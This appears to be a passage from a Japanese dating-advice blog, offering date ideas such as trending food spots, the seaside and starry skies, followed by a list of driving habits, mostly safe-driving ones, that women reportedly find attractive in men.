ツイッターやフェイスブックなどをこまめに確認して、今何が流行っているのか?をリサーチするといいです。

特にツイッターで女性向けに楽しい場所やグルメを発信しているアカウントは数多く存在しています。

気になる人がどのようなタイプの女性かにもよりますが、高確率で美味しいものは裏切らないです。

女性ならなら男性の胃袋を掴むべき!なんてよく言いますが、男性も同じく女性の胃袋を掴んでしまえば簡単に彼女やセフレにすることは可能です。

男の人がすべきことは事前に嫌いなものを女の人に尋ねておいて、お互い食べられるものでいい感じのお店に連れていってもらえると女の人は喜びます。

長時間並ぶことを考えると、話題の引き出しが多くないと気まずくなってしまうので、コミュニケーション能力が高くないとなかなか難しいかもしれませんが、人気のお店に一緒に並んでスウィーツを食べに行くのも一つの立派なデートプランだと思います。


続いて「綺麗な場所」ですが、抽象的すぎてさっぱり理解できない!と悶絶する方もいるかと思いますが、海や星空、この2つは鉄板スポットですね。

最近だと海でイベントやゴンドラに乗って星を見に行くツアーも存在しています。

海沿いで波の音に耳を傾けながら、二人だけのひと時を過ごす・・・これは女の人の憧れなんです。

手の込んだことをしなくてもムード漂う場所、それが海です。

その他イルミネーションの季節ならライトアップされている場所をゆっくり歩いたり、お花が好きな女の人ならバラ園などに連れて行くのも素敵ですね。

まとめ

女性サイドから見た「こんなデートはNG!」というパターンや、反対にロマンチック!と感じられるデートプランを紹介しました。

大事なポイントは『お金をかけたデートをしたら喜ばれるわけではなく、気持ちがこもっているデートが女の人の心を掴む』ということ、『デートで趣味を全面に出して行くのであれば、お互い楽しめる範囲で考える』そして『女子の好きなものをリサーチせよ』という点です。

この点を踏まえてデートプランを組んでみてください!

ドライブ中に女性がかっこいいと思う8つの仕草

ドライブ中、男性は運転中なので運転以外には特に何も気にしてはいないと思いますが、助手席に座る女性は男性のことをかなり気にしています。

女性も少しは考慮してくれるとは思いますが、運転中で一つも女性に気が回らなければ、それはそれで女性をがっかりさせてしまうことになります。

女性は何を見て男性の姿にかっこいいと感じているかまとめてみましたのでご紹介いたします。

急発進や急ブレーキにならないように気をつけてくれる



運転をするうえで基本中の事だとは思いますが、それが出来ない男性も多くいるようです。
そのおかけで、この基本操作が出来ていると女性は「運転上手だな」と好印象を与えられます。

無理に信号を渡ったり、余裕なくブレーキを踏んでしまうのは女性にとって「ちゃんと回りを見てるのかな?」「私がいるのにこんな雑な運転するんだ」と心配や、不安を抱えさせてしまうことになるので、出来るだけ余裕のある運転を心がけましょう。

もしも急ブレーキを踏むことになりそうなら、声をかけてあげると気を遣ってくれているんだと思い、好感度が上がるきっかけになります。

バック駐車を切り替えなしで入った時

これは鉄板ではありますが、やはり技術がある運転をされると女性は惚れてしまうみたいです。
駐車場でバッグをしながら駐車スペースに入れるというのは、何年も乗り慣れしているベテランの人からすれば、慣れたようなものかもしれませんが、あまり車に乗り慣れていない女性からすれば、その技術に感動してしまうのです。
それが切り替えなしで一度で入ったものなら、素晴らしいとまで思うでしょう

周りを見て何度も切り替えして駐車しようとしている車を見ると、確かにもう少し上手くできないのかな?と思うことも稀にあるかもしれません。
それよりは少ない回数、もしくは一度で入れてしまう方が見栄えもいいですよね。

もし、駐車スペースが狭く降りにくいだろうなと感じたら、先に降ろしてあげることも気遣いが出来、好印象を与えることができます。

カーナビ等の車内の操作を簡単にこなせてる時



女性の注文を簡単にこなしている姿を見ると、頼もしい印象を与え、男らしくかっこいいと思うようです。

レンタカー等で初めて乗る車であれば、操作に手間取るのも仕方ないですが、出来れば基本操作ぐらいは女性と会う前に予習しとくのがいいかもしれません。

女性の方が車の事に関しては情報が乏しいですから、男性にあれこれ聞いてしまうことが多いと思います。
その時にすぐに応えられなかったり、いろいろなところをいじって失敗してしまうと、頼りないなという印象を与えてしまいます。
と言っても車内の操作というのは、やることが限られていますから、カーナビやミュージック、エアコンの操作が一通りできていれば問題ないでしょう。

運転しているときの真剣な表情

ふとしたときに運転中の男性の真剣な顔を見て、キュンとする瞬間があるようです。
人通りの多い道や、高速道路など気を張って運転しなければならない場面では、こういう真剣な表情というのは女性に良い印象を与えます。

へらへら喋って危ない場面に遭遇するよりは、会話はなくていいから余裕のある運転を心がけてほしいと思うようです。

例えば、普段はふざけたり、ちゃかしてくるような男性が、運転の時は真剣な眼差しで集中しているところを見ると、そのギャップにやられてしまう女性もいるようですよ。

信号のない横断歩道で歩行者を優先した時



あまり人通りのない道路だと、横断歩道の前に人がいても車が優先して通り過ぎる光景は多くみられます。
そんな中で、そういう場面に遭遇した時に停まって、歩行者を優先してあげると、思いやるのある人だと印象が良くなります。

横断歩道はもちろん、公園の近くや、多くの自転車が道に置いてある場所なども、人が突然道路に出てくる可能性がありますから、そういった場所ではなるべく注意して運転してみましょう。

急ブレーキの時に手を出して守ってくれる

上記で急発進や急ブレーキをなるべくしない方が良いと書きましたが、やむを得ず急ブレーキをかけなければならなくなった場合、女性の前に手を出すか、肩を押さえて前で出ないようにしてあげるのも、女性からするとドキッとしてしまうみたいです。
この場合、女性に触れることになるのと、守ってあげることでドキドキ感が倍増するみたいです。
急ブレーキだったけど、スキンシップが取れたおかけで、悪い印象になることを防ぐ事が出来ます

急ブレーキをかけた後で「ごめんね、大丈夫だった?」と心配してあげることも好印象に繋げる一つの方法です。

マニュアル車の運転でギアチェンジをスムーズにこなしている時



最近ではオートマ限定の免許を持つ人が増え、マニュアル車に乗れる人が少なくなってきました。
その中でマニュアル車のギアチェンジをしながらの運転を見ると、女性からは男らしくかっこいい印象があるみたいです。

それも慣れた手つきで操作していると、見ていて気持ちがよく、大変な操作なのにそう見えないのが格好良く見えるみたいです。

安全運転を心がけてくれている

発進やブレーキ、車線変更、スピード、全てにおいて無理のない運転をしてくれていることは女性にとって、ちゃんと気を遣ってくれているなと安心でき、こういうことが出来る男性を理想としていることが多いようです。

目的地までの道のりや、混雑状況もその場で迅速な判断が出来、他のルートを使ったり、休憩をはさむなどして、不快な思いをしないような運転が出来ると印象が良くなります

無理やり車線変更したり、寄せたり詰めたり、高速道路で思いっきりスピードを出したり、よくわかりもしない細い道などを危うく通ったりするよりは、時間がかかってもいいので安全運転を心がけて気持ちの良いドライブである方が、女性には良いでしょう。

まとめ

主に女性を気遣って安全運転することが好印象であることは間違いありません。
ですが女性も全てを望んでいるわけではありませんから、意識をしすぎて裏目に出てしまったり、逆に危ない運転になってしまうことがないように、自分の出来る範囲内であることが一番良いようです。